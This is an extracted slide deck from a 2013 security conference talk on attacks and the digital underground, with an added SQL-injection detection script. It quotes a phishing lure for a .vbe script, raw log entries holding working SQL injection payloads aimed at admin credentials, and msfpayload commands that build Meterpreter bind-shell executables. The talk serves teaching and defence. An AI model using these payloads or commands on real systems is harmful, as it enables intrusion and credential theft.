Page 1
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
ATTACKS, LIES AND THE DIGITAL UNDERGROUND
Speaker: Andrea Pompili
There are only 10 types of people in the world:
Those who understand binary, and those who don't
Page 3
> Clean-up and hardening carried out across the board a year earlier
> Operating systems patched to the latest available version
> Full logging of all activity on the site
> 2 IPS (Intrusion Prevention System) devices in cascade
Page 4
Breach origin, 2012 (pie chart; only the legend survived extraction):
Outside: 70%
Inside - Accidental: 12%
Inside - Malicious: 9%
Inside: 5%
Unknown: 4%
Source: http://datalossdb.org/ 2012 statistics
Page 5
Overall attacks detected since 2007 (bar chart; only the bar values survived extraction, as three series of six values; they are regrouped here so that each line is one group of three, summing to 100%; the group and category labels were lost):
7,20% / 29,90% / 62,90%
6,20% / 41,20% / 52,60%
6,10% / 27,20% / 66,70%
5,70% / 34,10% / 60,20%
6,80% / 34,10% / 59,10%
6,80% / 30,70% / 62,50%
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia), "Rapporto OAI 2012"
Page 6
Impact of the attacks detected (bar chart; only the bar values survived extraction, in three groups of four, each summing to 100%; the group and category labels were lost):
76,00% / 3,80% / 16,80% / 3,40%
76,00% / 6,50% / 13,70% / 3,80%
76,40% / 6,70% / 13,70% / 3,20%
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia), "Rapporto OAI 2012"
Page 7
«It is not the objective of this "focus" to report the survey results in detail, but, analysing the data on the average values for the whole sample, the results can be considered:
• satisfactory for logical protection;
• very satisfactory for infrastructure security;
• sufficient for service security;
• in need of improvement for organisational security.»
«We can say we expected it»
Page 11
Aki Mon Telecom
Shane Atkinson
Canter & Siegel
Eddie Davidson
Peter Francis-Macrae
Davis Wolfgang Hawke
Jumpstart Technologies
Vandar Kushnir
Kevin Lipnitz
Wayne Mansfield
Oleg Nikolaenko
Alan Ralsky
Dave Rhodes
Scott Richter
Russian Business Network
iFrame Cash
SBT Telecom Network
Defcon Host
Micronnet Ltd.
InstallsCash
Sendar Argic
Richard Colbert
RBNet
Source: Panda Security, "The Cyber-crime Black Market: Uncovered" (2011)
Page 12
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
Page 14
(*) According to Frank Rieger, Chief Technology Officer at GSMK
Page 15
Source: Vincenzo Iozzo – OWASP Day 2012
Page 16
Source: Vincenzo Iozzo – OWASP Day 2012
Page 17
So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie's exploit, it took a chain of six different bugs in order to successfully break out of the Chrome sandbox.
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin.
(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)
Page 18
Blackhole Exploit Kit
Cool Exploit Kit
Page 19
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page 23
From: [email protected]
Sent: Thursday, November 04, 2004 7:48 PM
To: [email protected]
Subject: Configuration update
Hello,
you are receiving this e-mail because problems have been detected with your e-mail account. The cause of these problems lies in an incorrect configuration of your computer, which we ask you to update by connecting to the following address:
http://xxxx.rcs.it/software/av/index.html
Please run the auto-configuration script, Configurazione.vbe, whose link is available on the page indicated. When the configuration is complete, a message will appear confirming that the update was successful.
Best regards
Help Desk - RCS Technical Support
RCS Editori S.p.A. - Newspapers Division
Page 27
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=
1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,
substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),
floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"
Page 28
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]
"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=
11502+and(select+1+from(select+count(*),concat_ws(0x3a,
substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),
repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(
rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"
"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
Web Shell Extension
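The two slides above show raw access-log entries carrying SQL injection probes against the tx_wfqbe_pi1[uid] parameter: first a column-count probe (order by 1000), then error-based extraction through floor(rand(0)*2) and information_schema, with MySQL /*!...*/ versioned comments used to hide the keywords from naive filters. As an added example (not code from the slides or the speaker), here is detection logic a defender could run over such lines: it parses the Apache request line, undoes the + and percent encoding and the versioned comments, and reports which indicators fire. The sample entries are the slides' log lines joined onto single lines (the trailing HTTP/1.0 is assumed where a slide omits it) plus one constructed benign request for contrast; the indicator names, the regular expressions and the "suspicious" threshold are choices made for this example, not a vendor rule set.

```python
"""Flag SQL-injection probes in Apache access-log lines (added example)."""
import re
from typing import Optional
from urllib.parse import unquote_plus

# Client IP, timestamp and the quoted request line of an Apache access-log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)"')

# Each indicator runs against the normalised (decoded, comment-stripped,
# lower-cased) query string. Names and patterns are this example's own choice.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),        # column-count probing
    "schema_enum": re.compile(r"\binformation_schema\b"),        # catalogue enumeration
    "error_based_rand": re.compile(r"floor\s*\(\s*rand\s*\("),   # duplicate-key error trick
    "nested_select": re.compile(r"\bselect\b.+\bfrom\b"),        # embedded sub-query
    "comment_terminator": re.compile(r"(--|#)\s*$"),             # rest of the query discarded
    "credential_columns": re.compile(r"\b(username|password)\b"),
}
# A single comment terminator or column name is weak on its own; these are not.
HIGH_CONFIDENCE = {"order_by_probe", "schema_enum", "error_based_rand", "nested_select"}


def normalise(query: str) -> str:
    """Undo the encodings used to slip keywords past naive string matching."""
    q = unquote_plus(query)                   # '+' and %xx escapes
    q = re.sub(r"/\*(?!!).*?\*/", " ", q)     # ordinary block comments are noise
    q = re.sub(r"/\*!|\*/", " ", q)           # MySQL /*!keyword*/ executes: keep the keyword
    return re.sub(r"\s+", " ", q).strip().lower()


def analyse(line: str) -> Optional[dict]:
    """Parse one log line; return a finding, or None if it is not an access-log entry."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split(" ")     # METHOD target HTTP/x.y
    target = parts[1] if len(parts) > 1 else ""
    path, _, query = target.partition("?")
    hits = [name for name, rx in INDICATORS.items() if rx.search(normalise(query))]
    suspicious = len(hits) >= 2 or any(h in HIGH_CONFIDENCE for h in hits)
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": path,
            "indicators": hits, "suspicious": suspicious}


def scan(lines) -> list:
    """Return findings for the suspicious entries only, in log order."""
    return [f for f in map(analyse, lines) if f and f["suspicious"]]


# Sample input: the slides' entries joined onto single lines, plus a constructed benign request.
SAMPLE_LOG = [
    '173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]='
    '1+order+by+1000+--+ HTTP/1.0"',
    '178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]='
    '1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,'
    'user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+'
    '/*!information_schema*/.tables+group+by+x)a)+--+ HTTP/1.0"',
    '89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]='
    '11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat('
    'concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),'
    '1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+ HTTP/1.0" '
    '"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"',
    '10.0.0.5 - - [15/Nov/2012:12:40:00 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=42 HTTP/1.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["time"]} {finding["ip"]} {finding["path"]} -> {", ".join(finding["indicators"])}')
```

The decoding step matters more than the pattern list: matched against the raw request line, neither "select" nor "information_schema" appears as a plain word in the second entry, which is exactly what the /*!...*/ wrapping is for. Run against the sample above, the three probe entries are reported with their indicators and the benign request is not; the same parser applies unchanged to a full log file read line by line.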
Page 29
http://evader.stonesoft.com/
http://insecure.org/stf/secnet_ids/secnet_ids.html
Page 31
msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
Page 32
msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
Page 33
"The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose"
Page 34
<#1> Think like an attacker, so that you understand what they will do and how they will attack you
<#2> Try to understand their objectives and their capabilities, but above all their operational constraints
<#3> Identify the "perceived" value of what you want to defend, and above all what you want to defend
<#4> Work on the whole defensive perimeter, with no acts of faith
<#5> If your defence is cheaper than the attack, you will always be at an advantage
Page 36
Italian: Domande?
Arabic: مطالب أية
Spanish: ¿Preguntas?
English: Questions?
Klingon: tupoQghachmey
Sindarin: (text not recovered)
Japanese: (text not recovered)
Greek: Ερωτήσεις?
Russian: вопросы?